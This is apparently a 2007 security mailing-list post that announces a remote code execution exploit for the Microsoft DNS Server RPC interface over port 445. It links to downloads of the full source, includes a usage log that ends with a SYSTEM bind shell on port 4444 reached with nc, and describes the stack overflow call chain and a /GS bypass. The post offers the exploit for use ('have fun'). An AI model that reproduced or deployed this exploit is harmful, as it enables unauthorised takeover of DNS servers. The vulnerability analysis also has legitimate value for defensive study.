Microsoft DNS Server Remote Code execution: Analysis and exploit
Hi,
Im sending you the headers of the new exploit code for microsoft DNS servers.
You can download the full source code exploit and analysis at:
- http://www.514.es/Microsoft_Dns_Server_Exploit.zip
- http://www.48bits.com/exploits/dnsxpl.rar
/* Microsoft DNS Server Remote Code execution Exploit and analysis
Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
This remote exploit works against port 445 (also Microsoft RPC api used)
Author:
* Mario Ballano ( mballano~gmail.com )
* Andres Tarasco ( atarasco~gmail.com )
Timeline:
* April,12,2007: Microsoft advisory published
* April,13,2007: POC Exploit coded
* April,14,2007: Microsoft notified about a new attack vector against port
445 (this exploit code)
* April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish)
* April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS
bypassed
* April,16,2007: hackers hax the w0rld and got busted.
* April,xx,2007: Lammer release the first buggy worm
* Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary m.. being
abducted were found at NSA servers
Usage:
D:\DNSTEST>dnstest.exe 192.168.1.7
-------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code (port 445)
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
-------------------------------------------------------
[+] Trying to fingerprint target.. 05 02
[+] Remote Host identified as Windows 2003
[+] Connecting to
50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:192.168.1.7[\\pipe\\dnsserver]
[+] RpcBindingFromStringBinding returned 0x0
[+] Calling remote procedure DnssrvOperation()
[+] Now try to connect to port 4444
D:\DNSTEST>nc 192.168.1.7 4444
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
nt authority\system
Vulnerability Analysis:
The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer to
convert
a string calling Name_ConvertFileNameToCountName(), this string can contain
back-slash
octal characters. Although some bounds checks are done when writting to the
buffer is
still possible to bypass them using a string with multiple backslashed chars,
resulting
in a stack based buffer overflow.
This function can be reached through DNS RPC Interface, the execution flow
will be as follows:
R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd); // RPC
Exported function
R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
Zone_FindZoneByName(buggybuffer); // Here
we go!
Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0);
// Using fixed size local buffer
extractQuotedChar(x,x,buggybuffer);
// Extract octal number
Disassemblies at the end of the code:
References:
- Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft
Windows 2003 Server. (David Litchfield, NGSSoftware).
- www.48bits.com
- http://www.514.es
Just compile the code with nmake and have fun!
*/